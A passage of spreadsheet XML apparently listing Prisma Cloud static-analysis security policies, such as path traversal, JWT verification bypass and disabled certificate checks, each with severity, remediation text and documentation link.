      <c r="AI462" t="inlineStr"/>
      <c r="AJ462" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK462" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="463">
      <c r="A463" t="inlineStr"/>
      <c r="B463" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C463" s="2" t="inlineStr"/>
      <c r="D463" t="inlineStr"/>
      <c r="E463" t="inlineStr"/>
      <c r="F463" t="inlineStr"/>
      <c r="G463" t="b">
        <v>1</v>
      </c>
      <c r="H4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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J463" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K463" t="inlineStr">
        <is>
          <t>HTML autoescape mechanism globally disabled</t>
        </is>
      </c>
      <c r="L463" t="inlineStr"/>
      <c r="M463" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N463" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O463" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P463" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q463" t="inlineStr"/>
      <c r="R463" t="inlineStr"/>
      <c r="S463" t="inlineStr"/>
      <c r="T463" t="b">
        <v>0</v>
      </c>
      <c r="U463" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V463" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W463" t="inlineStr">
        <is>
          <t>HTML autoescape mechanism should not be globally disabled.</t>
        </is>
      </c>
      <c r="X463" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/python-policies/sast-policy-60</t>
        </is>
      </c>
      <c r="Y463" t="inlineStr"/>
      <c r="Z463" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA463" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB463" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC463" t="inlineStr">
        <is>
          <t>CKV3_SAST_60</t>
        </is>
      </c>
      <c r="AD463" t="b">
        <v>1</v>
      </c>
      <c r="AE463" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF463" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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3" t="inlineStr">
        <is>
          <t>ec8af148-ad66-4002-a5c5-5d639b61eda0</t>
        </is>
      </c>
      <c r="AI463" t="inlineStr"/>
      <c r="AJ463" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK463" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="464">
      <c r="A464" t="inlineStr"/>
      <c r="B464" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C464" s="2" t="inlineStr"/>
      <c r="D464" t="inlineStr"/>
      <c r="E464" t="inlineStr"/>
      <c r="F464" t="inlineStr"/>
      <c r="G464" t="b">
        <v>1</v>
      </c>
      <c r="H4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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J464" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K464" t="inlineStr">
        <is>
          <t>File path not validated in file uploads</t>
        </is>
      </c>
      <c r="L464" t="inlineStr"/>
      <c r="M464" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N464" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O464" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P464" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q464" t="inlineStr"/>
      <c r="R464" t="inlineStr"/>
      <c r="S464" t="inlineStr"/>
      <c r="T464" t="b">
        <v>0</v>
      </c>
      <c r="U464" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V464" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W464" t="inlineStr">
        <is>
          <t>The filename provided by the FileUpload API can be tampered with by the client to reference unauthorized files. The provided filename should be properly validated to ensure it's properly structured, contains no unauthorized path characters (e.g., / \), and refers to an authorized file.</t>
        </is>
      </c>
      <c r="X464" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-44</t>
        </is>
      </c>
      <c r="Y464" t="inlineStr"/>
      <c r="Z464" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA464" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB464" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC464" t="inlineStr">
        <is>
          <t>CKV3_SAST_44</t>
        </is>
      </c>
      <c r="AD464" t="b">
        <v>1</v>
      </c>
      <c r="AE464" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF464" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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4" t="inlineStr">
        <is>
          <t>a421ad37-266d-4977-96a7-eca6ba720d3e</t>
        </is>
      </c>
      <c r="AI464" t="inlineStr"/>
      <c r="AJ464" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK464" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="465">
      <c r="A465" t="inlineStr"/>
      <c r="B465" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C465" s="2" t="inlineStr"/>
      <c r="D465" t="inlineStr"/>
      <c r="E465" t="inlineStr"/>
      <c r="F465" t="inlineStr"/>
      <c r="G465" t="b">
        <v>1</v>
      </c>
      <c r="H4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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J465" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K465" t="inlineStr">
        <is>
          <t>JSON Web Tokens (JWT) signature verification bypass</t>
        </is>
      </c>
      <c r="L465" t="inlineStr"/>
      <c r="M465" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N465" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O465" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P465" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q465" t="inlineStr"/>
      <c r="R465" t="inlineStr"/>
      <c r="S465" t="inlineStr"/>
      <c r="T465" t="b">
        <v>0</v>
      </c>
      <c r="U465" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V465" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W465" t="inlineStr">
        <is>
          <t>Found an instance where the JWT decoding or processing is performed without proper verification of the token's signature, should use verify instead of decode.</t>
        </is>
      </c>
      <c r="X465" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/javascript-policies/sast-policy-181</t>
        </is>
      </c>
      <c r="Y465" t="inlineStr"/>
      <c r="Z465" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA465" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB465" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC465" t="inlineStr">
        <is>
          <t>CKV3_SAST_181</t>
        </is>
      </c>
      <c r="AD465" t="b">
        <v>1</v>
      </c>
      <c r="AE465" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF465" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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5" t="inlineStr">
        <is>
          <t>bd820c6a-60c1-4744-8b63-e31bf88d925d</t>
        </is>
      </c>
      <c r="AI465" t="inlineStr"/>
      <c r="AJ465" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK465" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="466">
      <c r="A466" t="inlineStr"/>
      <c r="B466" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C466" s="2" t="inlineStr"/>
      <c r="D466" t="inlineStr"/>
      <c r="E466" t="inlineStr"/>
      <c r="F466" t="inlineStr"/>
      <c r="G466" t="b">
        <v>1</v>
      </c>
      <c r="H4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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J466" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K466" t="inlineStr">
        <is>
          <t>Use of externally-controlled format string</t>
        </is>
      </c>
      <c r="L466" t="inlineStr"/>
      <c r="M466" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N466" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O466" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P466" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q466" t="inlineStr"/>
      <c r="R466" t="inlineStr"/>
      <c r="S466" t="inlineStr"/>
      <c r="T466" t="b">
        <v>0</v>
      </c>
      <c r="U466" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V466" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W466" t="inlineStr">
        <is>
          <t>The application's vulnerability arises from letting user input manipulate format string parameters, potentially causing exceptions or data leaks based on the application's logic. To fix this, never use user-supplied input for format strings; replace them with hardcoded strings containing the required specifiers.</t>
        </is>
      </c>
      <c r="X466" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-150</t>
        </is>
      </c>
      <c r="Y466" t="inlineStr"/>
      <c r="Z466" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA466" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB466" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC466" t="inlineStr">
        <is>
          <t>CKV3_SAST_150</t>
        </is>
      </c>
      <c r="AD466" t="b">
        <v>1</v>
      </c>
      <c r="AE466" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF466" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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6" t="inlineStr">
        <is>
          <t>5908a865-c88e-4405-aaf4-6fd85decfab3</t>
        </is>
      </c>
      <c r="AI466" t="inlineStr"/>
      <c r="AJ466" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK466" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="467">
      <c r="A467" t="inlineStr"/>
      <c r="B467" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C467" s="2" t="inlineStr"/>
      <c r="D467" t="inlineStr"/>
      <c r="E467" t="inlineStr"/>
      <c r="F467" t="inlineStr"/>
      <c r="G467" t="b">
        <v>1</v>
      </c>
      <c r="H4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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J467" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K467" t="inlineStr">
        <is>
          <t>Relative path traversal</t>
        </is>
      </c>
      <c r="L467" t="inlineStr"/>
      <c r="M467" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N467" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O467" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P467" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q467" t="inlineStr"/>
      <c r="R467" t="inlineStr"/>
      <c r="S467" t="inlineStr"/>
      <c r="T467" t="b">
        <v>0</v>
      </c>
      <c r="U467" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V467" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W467" t="inlineStr">
        <is>
          <t>The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize sequences such as ".." that can resolve to a location that is outside of that directory. This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory.</t>
        </is>
      </c>
      <c r="X467" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/python-policies/sast-policy-173</t>
        </is>
      </c>
      <c r="Y467" t="inlineStr"/>
      <c r="Z467" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA467" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB467" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC467" t="inlineStr">
        <is>
          <t>CKV3_SAST_173</t>
        </is>
      </c>
      <c r="AD467" t="b">
        <v>1</v>
      </c>
      <c r="AE467" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF467" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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7" t="inlineStr">
        <is>
          <t>0088f884-0e1d-4b52-a362-3a8692e8fe18</t>
        </is>
      </c>
      <c r="AI467" t="inlineStr"/>
      <c r="AJ467" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK467" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="468">
      <c r="A468" t="inlineStr"/>
      <c r="B468" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C468" s="2" t="inlineStr"/>
      <c r="D468" t="inlineStr"/>
      <c r="E468" t="inlineStr"/>
      <c r="F468" t="inlineStr"/>
      <c r="G468" t="b">
        <v>1</v>
      </c>
      <c r="H4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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J468" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K468" t="inlineStr">
        <is>
          <t>Use of insecure HTTP Connections with Axios</t>
        </is>
      </c>
      <c r="L468" t="inlineStr"/>
      <c r="M468" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N468" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O468" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P468" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q468" t="inlineStr"/>
      <c r="R468" t="inlineStr"/>
      <c r="S468" t="inlineStr"/>
      <c r="T468" t="b">
        <v>0</v>
      </c>
      <c r="U468" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V468" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W468" t="inlineStr">
        <is>
          <t>Ensure that HTTP connection is secure (HTTPS)</t>
        </is>
      </c>
      <c r="X468" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/javascript-policies/sast-policy-40</t>
        </is>
      </c>
      <c r="Y468" t="inlineStr"/>
      <c r="Z468" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA468" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB468" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC468" t="inlineStr">
        <is>
          <t>CKV3_SAST_40</t>
        </is>
      </c>
      <c r="AD468" t="b">
        <v>1</v>
      </c>
      <c r="AE468" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF468" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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8" t="inlineStr">
        <is>
          <t>8d02cbdd-d8a0-4a19-84b7-cb703fe313f8</t>
        </is>
      </c>
      <c r="AI468" t="inlineStr"/>
      <c r="AJ468" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK468" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="469">
      <c r="A469" t="inlineStr"/>
      <c r="B469" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C469" s="2" t="inlineStr"/>
      <c r="D469" t="inlineStr"/>
      <c r="E469" t="inlineStr"/>
      <c r="F469" t="inlineStr"/>
      <c r="G469" t="b">
        <v>1</v>
      </c>
      <c r="H4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69" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J469" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K469" t="inlineStr">
        <is>
          <t>Verify SSL certificates in requests are not disabled using "verify=False"</t>
        </is>
      </c>
      <c r="L469" t="inlineStr"/>
      <c r="M469" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N469" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O469" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P469" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q469" t="inlineStr"/>
      <c r="R469" t="inlineStr"/>
      <c r="S469" t="inlineStr"/>
      <c r="T469" t="b">
        <v>0</v>
      </c>
      <c r="U469" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V469" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W469" t="inlineStr">
        <is>
          <t>Certificate validation should be enabled.</t>
        </is>
      </c>
      <c r="X469" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/python-policies/sast-policy-186</t>
        </is>
      </c>
      <c r="Y469" t="inlineStr"/>
      <c r="Z469" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA469" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB469" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC469" t="inlineStr">
        <is>
          <t>CKV3_SAST_186</t>
        </is>
      </c>
      <c r="AD469" t="b">
        <v>1</v>
      </c>
      <c r="AE469" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF469" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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69" t="inlineStr">
        <is>
          <t>436e11f4-e59a-4fa7-9e99-48b197c69f56</t>
        </is>
      </c>
      <c r="AI469" t="inlineStr"/>
      <c r="AJ469" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK469" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="470">
      <c r="A470" t="inlineStr"/>
      <c r="B470" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C470" s="2" t="inlineStr"/>
      <c r="D470" t="inlineStr"/>
      <c r="E470" t="inlineStr"/>
      <c r="F470" t="inlineStr"/>
      <c r="G470" t="b">
        <v>1</v>
      </c>
      <c r="H4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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J470" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K470" t="inlineStr">
        <is>
          <t>Use of a broken or risky cryptographic algorithm</t>
        </is>
      </c>
      <c r="L470" t="inlineStr"/>
      <c r="M470" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N470" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O470" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P470" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q470" t="inlineStr"/>
      <c r="R470" t="inlineStr"/>
      <c r="S470" t="inlineStr"/>
      <c r="T470" t="b">
        <v>0</v>
      </c>
      <c r="U470" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V470" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W470" t="inlineStr">
        <is>
          <t>Cryptographic algorithms provide many different modes of operation, only some of which provide message integrity. Without message integrity an adversary can tamper with the ciphertext. Instead of using an algorithm that requires configuring a cipher mode, an algorithm that has built-in message integrity should be used. Consider using `ChaCha20Poly1305` or `AES-256-GCM` instead.</t>
        </is>
      </c>
      <c r="X470" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-148</t>
        </is>
      </c>
      <c r="Y470" t="inlineStr"/>
      <c r="Z470" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA470" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB470" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC470" t="inlineStr">
        <is>
          <t>CKV3_SAST_148</t>
        </is>
      </c>
      <c r="AD470" t="b">
        <v>1</v>
      </c>
      <c r="AE470" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF470" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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0" t="inlineStr">
        <is>
          <t>579db273-3999-4a29-97d1-be68c618620e</t>
        </is>
      </c>
      <c r="AI470" t="inlineStr"/>
      <c r="AJ470" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK470" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="471">
      <c r="A471" t="inlineStr"/>
      <c r="B471" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C471" s="2" t="inlineStr"/>
      <c r="D471" t="inlineStr"/>
      <c r="E471" t="inlineStr"/>
      <c r="F471" t="inlineStr"/>
      <c r="G471" t="b">
        <v>1</v>
      </c>
      <c r="H4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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J471" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K471" t="inlineStr">
        <is>
          <t>File path not validated for file writes</t>
        </is>
      </c>
      <c r="L471" t="inlineStr"/>
      <c r="M471" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N471" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O471" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P471" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q471" t="inlineStr"/>
      <c r="R471" t="inlineStr"/>
      <c r="S471" t="inlineStr"/>
      <c r="T471" t="b">
        <v>0</v>
      </c>
      <c r="U471" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V471" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W471" t="inlineStr">
        <is>
          <t>A file is opened to write to its contents. The filename comes from an input parameter. If an unfiltered parameter is passed to this file API, files at an arbitrary filesystem location could be modified. This rule identifies potential path traversal vulnerabilities. In many cases, the constructed file path cannot be controlled by the user.</t>
        </is>
      </c>
      <c r="X471" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-46</t>
        </is>
      </c>
      <c r="Y471" t="inlineStr"/>
      <c r="Z471" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA471" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB471" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC471" t="inlineStr">
        <is>
          <t>CKV3_SAST_46</t>
        </is>
      </c>
      <c r="AD471" t="b">
        <v>1</v>
      </c>
      <c r="AE471" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF471" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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1" t="inlineStr">
        <is>
          <t>99a9bd2b-938d-4e7e-907e-4a340148d468</t>
        </is>
      </c>
      <c r="AI471" t="inlineStr"/>
      <c r="AJ471" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK471" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="472">
      <c r="A472" t="inlineStr"/>
      <c r="B472" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C472" s="2" t="inlineStr"/>
      <c r="D472" t="inlineStr"/>
      <c r="E472" t="inlineStr"/>
      <c r="F472" t="inlineStr"/>
      <c r="G472" t="b">
        <v>1</v>
      </c>
      <c r="H4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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J472" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K472" t="inlineStr">
        <is>
          <t>Detection of XSS vulnerability</t>
        </is>
      </c>
      <c r="L472" t="inlineStr"/>
      <c r="M472" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N472" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O472" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P472" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q472" t="inlineStr"/>
      <c r="R472" t="inlineStr"/>
      <c r="S472" t="inlineStr"/>
      <c r="T472" t="b">
        <v>0</v>
      </c>
      <c r="U472" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V472" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W472" t="inlineStr">
        <is>
          <t>Detection of not using Helmet framework for XSS attacks</t>
        </is>
      </c>
      <c r="X472" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/javascript-policies/sast-policy-92</t>
        </is>
      </c>
      <c r="Y472" t="inlineStr"/>
      <c r="Z472" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA472" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB472" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC472" t="inlineStr">
        <is>
          <t>CKV3_SAST_92</t>
        </is>
      </c>
      <c r="AD472" t="b">
        <v>1</v>
      </c>
      <c r="AE472" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF472" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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2" t="inlineStr">
        <is>
          <t>e003de26-7669-485a-9686-4a672d69cf89</t>
        </is>
      </c>
      <c r="AI472" t="inlineStr"/>
      <c r="AJ472" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK472" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="473">
      <c r="A473" t="inlineStr"/>
      <c r="B473" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C473" s="2" t="inlineStr"/>
      <c r="D473" t="inlineStr"/>
      <c r="E473" t="inlineStr"/>
      <c r="F473" t="inlineStr"/>
      <c r="G473" t="b">
        <v>1</v>
      </c>
      <c r="H4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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J473" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K473" t="inlineStr">
        <is>
          <t>Logging data from untrusted sources leading to potential CRLF injection</t>
        </is>
      </c>
      <c r="L473" t="inlineStr"/>
      <c r="M473" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N473" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O473" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P473" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
